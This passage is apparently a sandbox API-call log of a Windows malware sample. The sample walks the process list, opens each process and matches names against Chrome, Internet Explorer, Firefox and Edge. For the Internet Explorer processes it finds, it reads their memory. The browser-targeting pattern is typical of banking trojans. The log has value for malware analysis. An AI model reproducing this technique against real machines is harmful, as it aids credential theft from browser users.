	[0250.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.637] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0250.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9fe0
	[0250.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.638] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0250.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0250.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.639] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0250.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9fe4
	[0250.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.640] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0250.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.641] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.642] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0250.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.642] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.643] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0250.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9fe8
	[0250.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.643] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0250.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.644] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.644] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0250.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.644] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0250.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9fec
	[0250.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.645] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0250.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.648] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.648] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0250.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.649] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0250.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9ff0
	[0250.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.650] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0250.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.651] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.651] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0250.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.652] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0250.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9ff4
	[0250.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.653] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0250.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.653] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.653] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0250.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.654] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0250.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9ff8
	[0250.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.655] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0250.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.655] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.655] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0250.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.655] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0250.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9ffc
	[0250.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.656] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0250.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.657] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.657] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0250.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.658] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0250.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa004
	[0250.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.659] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0250.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.660] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.660] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0250.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.661] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0250.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa008
	[0250.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.662] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0250.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.663] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.663] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0250.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.664] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.664] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0250.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa00c
	[0250.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.665] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0250.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.666] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.667] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0250.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.668] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0250.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa010
	[0250.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.670] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0250.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.671] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.671] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0250.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.671] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0250.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa014
	[0250.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0250.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.674] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.674] NtQueryInformationProcess (in: ProcessHandle=0xa014, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.674] ReadProcessMemory (in: hProcess=0xa014, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.674] ReadProcessMemory (in: hProcess=0xa014, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.674] ReadProcessMemory (in: hProcess=0xa014, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.674] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0250.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa018
	[0250.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0250.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.677] NtQueryInformationProcess (in: ProcessHandle=0xa018, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.677] ReadProcessMemory (in: hProcess=0xa018, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.677] ReadProcessMemory (in: hProcess=0xa018, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.677] ReadProcessMemory (in: hProcess=0xa018, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.677] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0250.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa01c
	[0250.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.678] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0250.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.679] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.679] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0250.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.679] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0250.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa020
	[0250.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.680] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0250.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.681] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.681] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0250.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.681] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa024
	[0250.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.683] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.683] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.683] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.684] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa028
	[0250.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.685] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.686] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.687] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.687] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa02c
	[0250.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.688] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.688] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.689] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.689] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0250.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa030
	[0250.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.690] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0250.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.691] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.691] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0250.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.691] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa034
	[0250.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.693] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.693] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.693] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.694] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa038
	[0250.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.695] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.695] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.695] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.696] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
